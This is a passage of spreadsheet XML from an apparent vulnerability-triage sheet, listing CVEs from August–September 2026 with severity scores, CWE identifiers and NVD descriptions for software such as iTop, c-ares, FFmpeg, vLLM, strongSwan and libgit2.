      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr"/>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr"/>
      <c r="Q469" s="5" t="inlineStr">
        <is>
          <t>CWE-330, CWE-331</t>
        </is>
      </c>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, inline images that are accessible without being authenticated are protected by a weak 24-bit pseudo-random secret. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27490</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30866</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr"/>
      <c r="Q470" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306</t>
        </is>
      </c>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, unauthenticated users can access uploaded sensitive via sniffed url. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30866</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33630</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr"/>
      <c r="Q471" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>c-ares is an asynchronous resolver library. From ver 1.32.3 until 1.34.7, a use-after-free / double-free in c-ares' query-completion handling. The same flaw — a query's callback being invoked while the query is still linked in the channel's internal lookup structures — is present at multiple points in the resend/finish path (timeout handling, response handling, and query dispatch). If the query, or for ares_getaddrinfo() the owning host_query, is freed as a side effect of that callback, it is then accessed and/or freed a second time. This vulnerability is fixed in ver 1.34.7.</t>
        </is>
      </c>
      <c r="S471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33630</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37198</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr"/>
      <c r="Q472" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the SMF component of Open5GS v2.7.6 allows attackers to cause a Denial of Service (DoS) via supplying a crafted GTP packet.</t>
        </is>
      </c>
      <c r="S472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37198</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37237</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr"/>
      <c r="Q473" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>vLLM up to and including 0.17.0 allows remote attackers to cause a Denial of Service via memory exhaustion. The AsyncMediaIO.fetch_audio and AsyncMediaIO.fetch_image functions in multimodal/inputs.py fetch user-supplied media URLs using aiohttp and call r.read() without enforcing a maximum response size, allowing an attacker to exhaust server memory by providing a URL to an arbitrarily large file.</t>
        </is>
      </c>
      <c r="S473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37237</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37736</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr"/>
      <c r="Q474" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>An issue in the JsonSanitizer.sanitize() component of OWASP json-sanitizer v1.2.3 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="S474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37736</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38346</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr"/>
      <c r="Q475" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the yuv2planeX_8_c() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted video file.</t>
        </is>
      </c>
      <c r="S475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38346</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38348</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr"/>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr"/>
      <c r="Q476" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the libswscale/utils.c component of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted image file.</t>
        </is>
      </c>
      <c r="S476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38348</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38349</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr"/>
      <c r="Q477" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the hScale16To19_c() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted image file.</t>
        </is>
      </c>
      <c r="S477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38349</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38350</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr"/>
      <c r="Q478" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the target_sws_fuzzer() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted input.</t>
        </is>
      </c>
      <c r="S478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38350</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38636</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr"/>
      <c r="Q479" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>An issue in the seekdir() function (/dirent/mod.rs) of relibc commit 61f42d allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="S479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38636</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38638</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr"/>
      <c r="Q480" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>An issue in the with_argv function (/unistd/mod.rs) of relibc commit 61f42d allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="S480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38638</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46369</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr"/>
      <c r="Q481" s="5" t="inlineStr">
        <is>
          <t>CWE-193, CWE-294</t>
        </is>
      </c>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Through 1.5.0, the validity store uses a strict lower-bound comparison that expires a stored transaction too early relative to Transaction::is_valid_at, allowing a remote attacker to replay the same signed transaction during a blocks_per_batch minus one block window and cause the sender and recipient balances to be updated twice. This issue is fixed in version 1.5.1.</t>
        </is>
      </c>
      <c r="S481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46369</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47895</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-08-22</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr"/>
      <c r="Q482" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>In strongSwan before 6.0.7, identity parsing/cloning is mishandled. Parsed EAP-Identities that result in an empty but non-NULL encoding are not correctly cloned and trigger a double-free once the duplicates are destroyed.</t>
        </is>
      </c>
      <c r="S482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47895</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48486</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr"/>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr"/>
      <c r="Q483" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>Signum Node is a HDD-mined cryptocurrency using an energy efficient and fair Proof-of-Commitment (PoC+) consensus algorithm. Prior to version 3.9.9, an integer overflow in BlockServiceImpl.applyBlock() allowed a miner to receive an arbitrarily inflated block reward by crafting a block with a negative totalFeeCashBackNqt value. The vulnerability was introduced when the SMART_FEES hardfork (block ~1,029,000) enabled fee cash-back and burn accounting without overflow protection. This issue has been patched in version 3.9.9.</t>
        </is>
      </c>
      <c r="S483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48486</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52482</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr"/>
      <c r="Q484" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>An issue in SJRC F11 SJ-GPS-PRO firmware build 2019-09-17 allows a remote attacker to obtain sensitive information via the inetd service spawns /app/sh_for_telnet</t>
        </is>
      </c>
      <c r="S484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52482</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53587</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr"/>
      <c r="Q485" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-126, CWE-1284, CWE-20</t>
        </is>
      </c>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, libgit2 performs a fixed-size strncmp in set_data in src/libgit2/transports/smart_pkt.c without first verifying that the smart-protocol pkt-line capability buffer contains 14 bytes. A malicious Git server can make bytes after the pkt-line complete object-format=, causing format_str to advance beyond the pkt-line and the following memchr length calculation to underflow. The resulting heap out-of-bounds walk can crash a client during the first refs-advertisement packet over HTTP, HTTPS, SSH, or the Git protocol. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="S485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53587</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54788</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
